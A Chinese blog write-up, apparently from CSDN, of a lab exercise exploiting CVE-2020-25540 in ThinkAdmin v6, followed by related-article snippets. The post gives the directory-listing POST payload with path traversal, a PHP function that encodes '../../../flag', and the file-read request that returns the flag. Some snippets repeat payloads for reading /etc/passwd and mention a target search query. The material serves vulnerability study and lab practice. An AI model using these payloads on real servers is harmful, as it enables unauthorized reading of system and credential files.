春秋云镜 CVE-2020-25540

已于 2023-08-07 15:03:30 修改
阅读量698 收藏 2
点赞数 1
分类专栏: 靶场 文章标签: 安全 web安全
于 2023-08-07 15:01:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22002773/article/details/132143462
版权

春秋云镜 CVE-2020-25540 Thinkadmin v6任意文件读取漏洞

靶标介绍

ThinkAdmin 6版本存在路径查找漏洞,可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。

启动场景

在这里插入图片描述

漏洞利用

1、未授权列目录poc

读取网站根目录Payload: http://think.admin/ThinkAdmin/public/admin.html?s=admin/api.Update/node
POST:

rules=[“/”]
rules=[“…/…/…/”] (目录穿越)

在这里插入图片描述
2、任意文件读取
使用加密函数对文件名进行加密

<?php
function encode($content)
{
    [$chars, $length] = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT', $content))];
    for ($i = 0; $i < $length; $i++) $chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0);
    return $chars;
}
$content="../../../flag";
echo encode($content);
?>

在这里插入图片描述
加密后的文件名为1a1a1b1a1a1b1a1a1b2u302p2v
请求http://eci-2ze3dysieeo26l90ip96.cloudeci1.ichunqiu.com/admin.html?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a1b2u302p2v
在这里插入图片描述
base64解密得到文件内容
在这里插入图片描述
得到flag

flag{cef71ab7-c930-408d-8074-52350766063b}

isbug0
关注
专栏目录
ThinkAdmin漏洞CVE-2020-25540 )复现
玄道的网安博客
10-18 5322
简介 ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统 漏洞概述 ThinkAdmin6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,没有任何过滤。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的任意文件。 影响版本 ThinkAdmin版本小于 ≤ 2020.08.03.01 环境搭建 使用phpstudy进行安装 设置阿里云 Composer 代理 composer config -g repo.packagist c...
春秋云镜CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
Ambition_sec的博客
11-17 1633
春秋云镜CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
云镜CVE-2020-25540复现
m0_46684679的博客
02-26 761
Thinkadmin v6任意文件读取漏洞
ThinkAdmin6 任意文件读取漏洞cve-2020-25540
最新发布
Fright-Moch的博客
08-13 266
在我们日常中遇到了ThinkAdmin6任意文件读取时候,常常无法控制路径,为此我把网上的exp拆分出来。这是网上公开的exp。
thinkadmin 目录遍历 (CVE-2020-25540
qq_23003811的博客
07-19 293
ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin v6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。3、1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s对应./../../etc/passwd的生成方法。在本地php环境,把脚本得到到poc.php中,访问poc.php生成。v5(任意文件读取)v6(列目录,任意文件读取)对结果进行base64解码。2、文件读取+目录穿越。
ThinkAdminV6 CVE-2020-25540 目录遍历文件读取漏洞
3hex的博客
11-23 4888
POC:https://github.com/Schira4396/CVE-2020-25540/blob/main/poc.pyhttps://github.com/Schira4396/CVE-2020-25540/blob/main/poc.py 影响版本: ThinkAdmin版本 ≤ 2020.08.03.01 漏洞详解: https://github.com/zoujingli/ThinkAdmin/issues/244https://github.com/zoujingli/Think
ThinkAdmin任意文件读取漏洞CVE-2020-25540
MD@@nr丫卡uer
02-04 804
简述 ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统 漏洞描述 ThinkAdmin6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,没有任何过滤。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的任意文件。 漏洞复现 fofa搜索语句 app="ThinkAdmin" POC POST /admin/login.html/?s=admin/api.Update/node HTTP/1.1 Host: 127.0.0.1 Content-Length: 21 Cach
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
春秋云镜CVE-2024-0195【记录】
zhiquovo的博客
03-07 1055
春秋云镜CVE-2024-0195【记录】 漏洞描述 SpiderFlow爬虫平台项目中spider-flow-web\src\main\java\org\spiderflow\controller\FunctionController.java文件的FunctionService.saveFunction函数调用了saveFunction函数,该调用了自定义函数validScript,该函数中用户能够控制 functionName、parameters 或 script 中的内容,从而构造恶意输入来执行
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
Ambition_sec的博客
11-16 687
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
春秋云镜CVE-2020-2551
09-21
根据引用[2]所提到的信息,春秋云镜可以发现并报告Oracle WebLogic Server产品中的高危漏洞CVE-2020-2551。这个漏洞的CVSS评分为9.8分,表示其危害程度非常高。该漏洞允许攻击者通过基于IIOP协议执行远程代码。因此...
ThinkAdmin后台管理系统
08-07
Think Admin 1.0 基于ThinkPHP5开发,初始的1.0版本没有开发成CMS,只是个后台管理系统,附带常用的功能,方便扩展使用。
CVE-2020-25540:ThinkAdmin未授权列目录/任意文件读取漏洞复现
Jietewang的博客
12-11 3274
1. 简介 ThinkAdmin 是基于 ThinkPHP后台开发框架,在ThinkAdmin v6版本存在路径遍历漏洞,该漏洞可以利用GET请求编码参数读取远程服务器上任意文件。 2. 影响范围 Thinkadmin2020.08.03.01 v5(任意文件读取) v6(列目录,任意文件读取) 3. 环境搭建 ThinkAdmin 源码仓库:https://github.com/zoujingli/ThinkAdmin 详细安装过程请查看官方手册,环境搭建过程均来自手...
ThinkAdmin列目录/任意文件读取(CVE-2020-25540漏洞复现及环境搭建
yzl_007的博客
08-03 2705
ThinkAdmin列目录/任意文件读取(CVE-2020-25540漏洞复现 漏洞介绍 ThinkAdmin 是基于 ThinkPHP后台开发框架,在ThinkAdmin v6版本存在路径遍历漏洞,该漏洞可以利用GET请求编码参数读取远程服务器上任意文件。 影响范围 Thinkadmin2020.08.03.01 v5(任意文件读取) v6(列目录,任意文件读取) ThinkAdmin6环境搭建 这里我使用的是kali linux靶机来搭建环境 1、安装php环境 查看版本发现没有,按照要求
ThinkAdmin任意文件读取(CVE-2020-25540)
m0_65150886的博客
01-23 577
ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。该漏洞主要是因为api中存在危险函数,且未作任何限制。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的文件。1.访问http://ip:port,出现如下页面,开始实验。获取/etc/passwd的base64编码。2.构造payload。4.base64解码。
ThinkAdminCVE-2020-25540漏洞复现
m0_48520508的博客
11-09 1922
0x00简介 ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 非常适用快速二次开发,默认集成 微信开发组件,支持微信服务号,微信支付,支付宝支付,阿里云OSS存储,七牛云存储,本地服务器存储。,ThinkAdmin的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。 0x01漏洞概述 ThinkAdmin V6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,且未作任何限制。未
记一次对某个未成年禁入app的渗透测试
渗透测试研究中心
01-05 904
0x01 thinkadmin历史漏洞复习已经找到对方的app的后台地址是thinkadmin,因此我们需要去复习thinkadmin的历史漏洞CVE-2020-25540https://github.com/zoujingli/ThinkAdmin/issues/244利用POC如下https://github.com/Schira4396/CVE-2020-25540列目录POST /?s...
Think.PHP框架漏洞复现
m0_71300782的博客
09-13 1459
2.服务器启动先cd到thinkphp文件夹下面的5-rce里面,然后docker-compose up -d 安装环境3.进入浏览器ip地址加8080看见。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值